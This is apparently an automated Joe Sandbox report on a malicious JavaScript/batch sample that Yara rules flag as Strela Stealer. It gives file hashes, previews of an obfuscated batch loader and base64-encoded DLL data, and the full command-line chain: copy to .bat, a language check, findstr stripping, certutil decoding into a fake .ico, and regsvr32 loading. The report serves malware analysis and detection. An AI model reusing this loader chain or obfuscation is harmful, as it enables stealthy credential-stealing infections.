World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1417160
Start date and time:	2024-03-28 17:39:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Without Instrumentation
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.js
Detection:	MAL
Classification:	mal100.troj.expl.evad.winJS@16/7@0/0
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .js

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: file.js

Simulations

Behavior and APIs

Time	Type	Description
17:39:56	API Interceptor	1x Sleep call for process: WMIC.exe modified

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.7307872139132228
Encrypted:	false
SSDEEP:	3:NlllulF/lll:NllUF/ll
MD5:	3ECB05F56210644B241FF459B861D309
SHA1:	1A33420F5866C42A5ED3CFF0DD505451FBFA8072
SHA-256:	712FFFDDF0CCED8E7AD767551D53F38D2682E171595701A31F73AC916F7134E0
SHA-512:	79DC8B376BDAE7F0BA59108D89D9DA4CD6B1E7AB0280DB31A030E4C4507AB63D22D9DF6443DE18E92D64382AA97F051AC1D6FAFE07CA9281BEBD129A91EB19B8
Malicious:	false
Reputation:	low
Preview:	@...e.................................^.........................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gw4xkmxd.b3h.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jyezsyz1.ev4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\childlikeclearintroduce.ico

Download File

Process:	C:\Windows\System32\certutil.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	217854
Entropy (8bit):	7.137051421026175
Encrypted:	false
SSDEEP:	3072:GYT7l9iCrI+6+I3S79OqjdDRMgMHT3QyHN5VPTsLc5nwS0tgeAxEvS09Mb3XXz7C:GYuZlc9dBhi7sLc5n50tgruv/CjXX/UB
MD5:	7E1529697AAC44E5A46CB7DBCA337029
SHA1:	B53ED2A757827ABD2D020B5BD9CB860B1D02D705
SHA-256:	BE74987F0F80B269C4F7E24D748D95011B10047FAA94713A5DD09667F2C49B58
SHA-512:	FE240573D1378D3ADAFF5F7559F6E0832BB5F95188F61C2FD47BEA0C189CBDDD84C8060EC2D38CD547B49BF7673F832C90CE9D6644123196F98058D0FC6E4554
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....P.f..........& ...)......................L......................................>....`... .........................................L....................................@..x...........................`...(...................X................................text..............................`..`.data...`...........................@....rdata..............................@..@/4..................................@....pdata..............................@..@.xdata..............................@..@.bss....`................................edata..L...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..x....@......................@..B/14.....P....P......................@..B/29..........`......................@..B/41..........p......................@..B/55.....

C:\Users\user\deepdidacticfour

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with very long lines (3189), with CRLF line terminators
Category:	modified
Size (bytes):	290656
Entropy (8bit):	5.650621834731874
Encrypted:	false
SSDEEP:	6144:pMJG53b6/eR6+9RtBBg6G/MsfYrxdmQuU:pM053bvRDDBBg6N/
MD5:	E3FDA10334A83DBB755330DD3A63BC21
SHA1:	A72086D7F20D8B37C5EC8D02FBDDDFD444497B5B
SHA-256:	4792C6AC4CED98AD8DD453E8814C920A28922FF7A69E3E5064FE506A81A03817
SHA-512:	D318D3820D94FFF073091EF4188D69DD7B2B6844F4AAEA920598E3A618FD4950C518C0716C4B821FA3CC2036FC76A4909FDBB2A59028348296FC33D0D2CBB8A3
Malicious:	false
Preview:	TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYTAMZQBWYA6AIApwQAAPAAJiALAgIpALAAAADGAgAAAgAAkhIAAAAQAAAAAEz8AgAAAAAQAAAAAgAABAAAAAAAAAAFAAIAAAAAAADAAwAABgAA4z4EAAMAYAEAACAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAAAAADAEwAAAAAEAMAsAgAAAAAAAAAAAAAANACAKACAAAAAAAAAAAAAABAAwB4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYLACACgAAAAAAAAAAAAAAAAAAAAAAAAAWBIDAKABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAANiuAAAAEAAAALAAAAAGAAAAAAAAAAAAAAAAAABgAABgLmRhdGEAAABg7gEAAMAAAADwAQAAtgAAAAAAAAAAAAAAAAAAQAAAwC5yZGF0YQAAEAkAAACwAgAACgAAAKYCAAAAAAAAAAAAAAAAAEAAAEAvNAAAAAAAAAQAAAAAwAIAAAIAAACwAgAAAAAAAAAAAAAAAABAAADALnBkYXRhAACgAgAAANACAAAEAAAAsgIAAAAAAAAAAAAAAAAAQAAAQC54ZGF0YQAAjAIAAADgAgAABAAAALYCAAAAAAAAAAAAAAAAAEAAAEAuYnNzAAAAAGABAAAA8AIAAAAAAAAAAAAAAAAAAAAAAAAAAACAAADALmVkYXRhAABMAAAAAAADAAACAAAAugIAAAAAAAAAAAAAAAAAQAAAQC5pZGF0YQAAsAgAAAAQAwAACgAAALwCAAAAAAAAAAAAAAAAAEAA

C:\Users\user\stiffrelievedawesome.bat

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with very long lines (3189), with CRLF line terminators
Category:	dropped
Size (bytes):	321034
Entropy (8bit):	5.79551228137475
Encrypted:	false
SSDEEP:	6144:4MJG53b6/eR6+9RtBBg6G/MsfYrxdmQuPrPU+7:4M053bvRDDBBg6NCPF
MD5:	2ECFB5962169FD0CD5481A5BDFA56BBA
SHA1:	9E97ED9944BC0442554B423009F1B4950811A4FC
SHA-256:	B50491831CB3674FCDB34933AD61D233AC2CC275AC396D00F7257F9BC0328A97
SHA-512:	4FF559DA10FF93D72F0207178F2DA7804AFF4A8470652630C43C106283280140329FCD14A567EC11482AA248E3F7CEB775DE762FBFF1B2C1FE368BD5BAB7FDDF
Malicious:	true
Yara Hits:	Rule: JoeSecurity_EXEembeddedinBATfile, Description: Yara detected EXE embedded in BAT file, Source: C:\Users\user\stiffrelievedawesome.bat, Author: Joe Security
Preview:	/* joyousintroducebreezy..set joyousintroducebreezyadmirekindheartediron=r..set joyousintroducebreezyold-fashionedfewuse=c..set joyousintroducebreezyairportfascinatedaddicted=e..set joyousintroducebreezyphobicbalancehappy=w..set joyousintroducebreezyfeeblecoachrose=o..set joyousintroducebreezysmellylimitwax=t..set joyousintroducebreezylaboredvegetabledomineering=m..set joyousintroducebreezychallengefierceworried=a..set joyousintroducebreezydraconianbeliefgusty=u..set joyousintroducebreezyusedmasktree=d..set joyousintroducebreezybucketheapproperty=h..set joyousintroducebreezyagonizingcoldwind=b..set joyousintroducebreezydancedowntownignore=k..set joyousintroducebreezytrailfemaledrum=i..set joyousintroducebreezygreedydisturbedwarm=q..set joyousintroducebreezysofaparchedrule=p..set joyousintroducebreezyversebluegrowth=n..set joyousintroducebreezystakingsuitfeeble=x..set joyousintroducebreezyrottenqueuecoherent=l..set joyousintroducebreezymomsonghome=j..set joyousintroducebreezymakeshiftvi

C:\Users\user\stiffrelievedawesome.bat:Zone.Identifier

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	ASCII text, with very long lines (3189), with CRLF line terminators
Entropy (8bit):	5.79551228137475
TrID:	Java Script (8502/1) 100.00%
File name:	file.js
File size:	321'034 bytes
MD5:	2ecfb5962169fd0cd5481a5bdfa56bba
SHA1:	9e97ed9944bc0442554b423009f1b4950811a4fc
SHA256:	b50491831cb3674fcdb34933ad61d233ac2cc275ac396d00f7257f9bc0328a97
SHA512:	4ff559da10ff93d72f0207178f2da7804aff4a8470652630c43c106283280140329fcd14a567ec11482aa248e3f7ceb775de762fbff1b2c1fe368bd5bab7fddf
SSDEEP:	6144:4MJG53b6/eR6+9RtBBg6G/MsfYrxdmQuPrPU+7:4M053bvRDDBBg6NCPF
TLSH:	CC64B0B35D473EC9976D4FC4F942E6200CAC7EF72354D2A0AD98278667F80694E10DAE
File Content Preview:	/* joyousintroducebreezy..set joyousintroducebreezyadmirekindheartediron=r..set joyousintroducebreezyold-fashionedfewuse=c..set joyousintroducebreezyairportfascinatedaddicted=e..set joyousintroducebreezyphobicbalancehappy=w..set joyousintroducebreezyfeebl

File Icon


Icon Hash:	68d69b8bb6aa9a86

Target ID:	0
Start time:	17:39:55
Start date:	28/03/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.js"
Imagebase:	0x7ff70e8b0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	17:39:56
Start date:	28/03/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\file.js" "C:\Users\user\\stiffrelievedawesome.bat" && "C:\Users\user\\stiffrelievedawesome.bat"
Imagebase:	0x7ff686460000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	17:39:56
Start date:	28/03/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	17:39:56
Start date:	28/03/2024
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_operatingsystem get oslanguage
Imagebase:	0x7ff662070000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	17:39:56
Start date:	28/03/2024
Path:	C:\Windows\System32\find.exe
Wow64 process (32bit):	false
Commandline:	find /i "1033"
Imagebase:	0x7ff777b90000
File size:	17'920 bytes
MD5 hash:	4BF76A28D31FC73AA9FC970B22D056AF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	17:39:57
Start date:	28/03/2024
Path:	C:\Windows\System32\findstr.exe
Wow64 process (32bit):	false
Commandline:	findstr /V joyousintroducebreezy ""C:\Users\user\\stiffrelievedawesome.bat""
Imagebase:	0x7ff7a05d0000
File size:	36'352 bytes
MD5 hash:	804A6AE28E88689E0CF1946A6CB3FEE5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	17:39:57
Start date:	28/03/2024
Path:	C:\Windows\System32\certutil.exe
Wow64 process (32bit):	false
Commandline:	certutil -f -decode deepdidacticfour childlikeclearintroduce.ico
Imagebase:	0x7ff6010d0000
File size:	1'651'712 bytes
MD5 hash:	F17616EC0522FC5633151F7CAA278CAA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	17:39:57
Start date:	28/03/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell regsvr32 childlikeclearintroduce.ico
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	17:39:58
Start date:	28/03/2024
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\regsvr32.exe" childlikeclearintroduce.ico
Imagebase:	0x7ff7e9710000
File size:	25'088 bytes
MD5 hash:	B0C2FA35D14A9FAD919E99D9D75E1B9E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_StrelaStealer, Description: Yara detected Strela Stealer, Source: 00000008.00000002.1705298103.00007FFE1023E000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_StrelaStealer, Description: Yara detected Strela Stealer, Source: 00000008.00000002.1705219928.0000000002B81000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.6%
Dynamic/Decrypted Code Coverage:	15.9%
Signature Coverage:	3.7%
Total number of Nodes:	82
Total number of Limit Nodes:	2

Executed Functions

Function 02B86908 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,?,?,?,?,?,02B86904), ref: 02B86933

Memory Dump Source

Source File: 00000008.00000002.1705219928.0000000002B81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2b81000_regsvr32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 6f2daaeeca48df6809e1ef62a5907e3c123bc7a7416cb568dceb1a8a4d26e80d
Instruction ID: bb1bd184a73e062827b8d35a5ab3b1c87a76bb168c53463f75000f67aa01f2eb
Opcode Fuzzy Hash: 6f2daaeeca48df6809e1ef62a5907e3c123bc7a7416cb568dceb1a8a4d26e80d
Instruction Fuzzy Hash: DCD05E203003084FEB1C7BB09A88229275ACB89205F00187C561BCB6D2DD38D804C702

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFE102314B0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 40
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00007FFE102314C7
LoadLibraryA.KERNEL32 ref: 00007FFE102314D8
GetProcAddress.KERNEL32 ref: 00007FFE102314F6
GetProcAddress.KERNEL32 ref: 00007FFE10231505

Strings

__deregister_frame_info, xrefs: 00007FFE102314F8
__register_frame_info, xrefs: 00007FFE102314E5
libgcc_s_dw2-1.dll, xrefs: 00007FFE102314BD

Memory Dump Source

Source File: 00000008.00000002.1705262813.00007FFE10231000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE10230000, based on PE: true

Associated: 00000008.00000002.1705251716.00007FFE10230000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705275455.00007FFE1023C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705286896.00007FFE1023D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705298103.00007FFE1023E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705314213.00007FFE1025B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705326272.00007FFE1025D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705347547.00007FFE10261000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705360161.00007FFE10264000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705360161.00007FFE10266000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705360161.00007FFE1026A000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe10230000_regsvr32.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: eac4c94454c1683f2d1643de50e5298fc4e81923689dd3558cc9618993412369
Instruction ID: 6244525d03add14c1aff11abf6b0fedf68933ef7e5f44f2a8bf370e0af9f5ecc
Opcode Fuzzy Hash: eac4c94454c1683f2d1643de50e5298fc4e81923689dd3558cc9618993412369
Instruction Fuzzy Hash: C2010961E09E1B98EA159B07B8101B52B64BFC87B4BA801B1CE1D573B6FF2CE50AC304

Uniqueness

Uniqueness Score: -1.00%

Function 02B8EE88 Relevance: 1.8, APIs: 1, Instructions: 321COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 02B8F0D7

Memory Dump Source

Source File: 00000008.00000002.1705219928.0000000002B81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2b81000_regsvr32.jbxd

Yara matches

Similarity

API ID: _clrfp
String ID:
API String ID: 3618594692-0
Opcode ID: bf11b2a348dd1cebbe3407e039c1e158691c8c076b119f432e33d7f46d24fa38
Instruction ID: 9f70995267c3afe60f3f06e28a59a1714ca2092007e4e8e1dcc4126be755abe4
Opcode Fuzzy Hash: bf11b2a348dd1cebbe3407e039c1e158691c8c076b119f432e33d7f46d24fa38
Instruction Fuzzy Hash: 5AB17931520A4D8FDB99EF1CC88AB6677E0FF59308F588599E85DCB262C335D892CB01

Uniqueness

Uniqueness Score: -1.00%

Function 02B81240 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1705219928.0000000002B81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2b81000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5a872e6d0ce145e63e4b493c0a28ebaad772e9be0e78487281bcf853c86d47e
Instruction ID: 34edad2a8ef5c2d7471891838fa393843d97e2a2b412097c351579ae7a275491
Opcode Fuzzy Hash: c5a872e6d0ce145e63e4b493c0a28ebaad772e9be0e78487281bcf853c86d47e
Instruction Fuzzy Hash: 83E15E70528B488FDB75EF18DC95AEAB7E1FB94304F40466EE48EC3520DB749641CB82

Uniqueness

Uniqueness Score: -1.00%

Function 02B81740 Relevance: .3, Instructions: 332COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1705219928.0000000002B81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2b81000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15cc186248de5ca8b7905a83fea9e7948ffbd5913fd68f4cba90bb8ca2c85fa2
Instruction ID: 77253702432b3694a47a97f60c756bdf6eb56b79fc061d001e423ec9fac10725
Opcode Fuzzy Hash: 15cc186248de5ca8b7905a83fea9e7948ffbd5913fd68f4cba90bb8ca2c85fa2
Instruction Fuzzy Hash: 74B15D31218A498FDB29EF28DC986FA73E1FB94305F54426AD45FC3590EF349A06CB81

Uniqueness

Uniqueness Score: -1.00%

Function 02B86C5C Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.1705219928.0000000002B81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2b81000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7755fe846fb63fdab89a2c0b004d9a83724ebd39b55f4d955bef4c225e210f78
Instruction ID: 49897fa3cb8b58d9d419a7afcfd5dbccbfba96703ba9c47dbf7cc40e01375ca8
Opcode Fuzzy Hash: 7755fe846fb63fdab89a2c0b004d9a83724ebd39b55f4d955bef4c225e210f78
Instruction Fuzzy Hash: DA51F232318E0C8F8B1CEF6CD89867573D2E7AC314315826EE40ED72A5DA70E8468785

Uniqueness

Uniqueness Score: -1.00%

Function 02B83A50 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 463
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 02B83AAC

Part of subcall function 02B849F4: __GetUnwindTryBlock.LIBCMT ref: 02B84A37
Part of subcall function 02B849F4: __SetUnwindTryBlock.LIBVCRUNTIME ref: 02B84A5C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 02B83B84
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 02B83DD3
std::bad_alloc::bad_alloc.LIBCMT ref: 02B83EDF

Strings

csm, xrefs: 02B83AC6
csm, xrefs: 02B83BA7
csm, xrefs: 02B83B2D

Memory Dump Source

Source File: 00000008.00000002.1705219928.0000000002B81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2b81000_regsvr32.jbxd

Yara matches

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 8e496da07347f5ca4c0083d8cca6809d31876793616045b4dee25a5dda52bfd8
Instruction ID: 3545d1fe30d13a1a165a507286fba6b1a81df5f26d1af7d0718fd667230cea38
Opcode Fuzzy Hash: 8e496da07347f5ca4c0083d8cca6809d31876793616045b4dee25a5dda52bfd8
Instruction Fuzzy Hash: 1AE17231918B488FDB24FF68C4856A9B7E1FB99714F5406DEE84DC7251DB34E881CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1023A960 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 183
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,00007FFE1023AC97), ref: 00007FFE1023A9B3

Strings

VirtualProtect failed with code 0x%x, xrefs: 00007FFE1023AC88
Address %p has no image-section, xrefs: 00007FFE1023AA97
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FFE1023AB94
Mingw-w64 runtime failure:, xrefs: 00007FFE1023A99B

Memory Dump Source

Source File: 00000008.00000002.1705262813.00007FFE10231000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE10230000, based on PE: true

Associated: 00000008.00000002.1705251716.00007FFE10230000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705275455.00007FFE1023C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705286896.00007FFE1023D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705298103.00007FFE1023E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705314213.00007FFE1025B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705326272.00007FFE1025D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705347547.00007FFE10261000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705360161.00007FFE10264000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705360161.00007FFE10266000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705360161.00007FFE1026A000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe10230000_regsvr32.jbxd

Yara matches

Similarity

API ID: __acrt_iob_func
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 711238415-1534286854
Opcode ID: 22bd08bf3ace6588938a1acacbc043cc81844aa84b39eaebb0131b0af98e6ef0
Instruction ID: f164e64ae8ead92d781da1d312819bf43c8aed45f2b99bd6ff152f6b6158627e
Opcode Fuzzy Hash: 22bd08bf3ace6588938a1acacbc043cc81844aa84b39eaebb0131b0af98e6ef0
Instruction Fuzzy Hash: DE715DA2F05B498EEB50CB56E8816A927A1FB88BD4F544475DF0D9776AEF3CE601C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1023BAF0 Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_configure_wide_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1023BB21
__p___argc.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1023BB26
__p___wargv.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1023BB33
__p__wenviron.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 00007FFE1023BB42
_set_new_mode.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE1023BB60

Memory Dump Source

Source File: 00000008.00000002.1705262813.00007FFE10231000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE10230000, based on PE: true

Associated: 00000008.00000002.1705251716.00007FFE10230000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705275455.00007FFE1023C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705286896.00007FFE1023D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705298103.00007FFE1023E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705314213.00007FFE1025B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705326272.00007FFE1025D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705347547.00007FFE10261000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705360161.00007FFE10264000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705360161.00007FFE10266000.00000002.00000001.01000000.00000006.sdmpDownload File
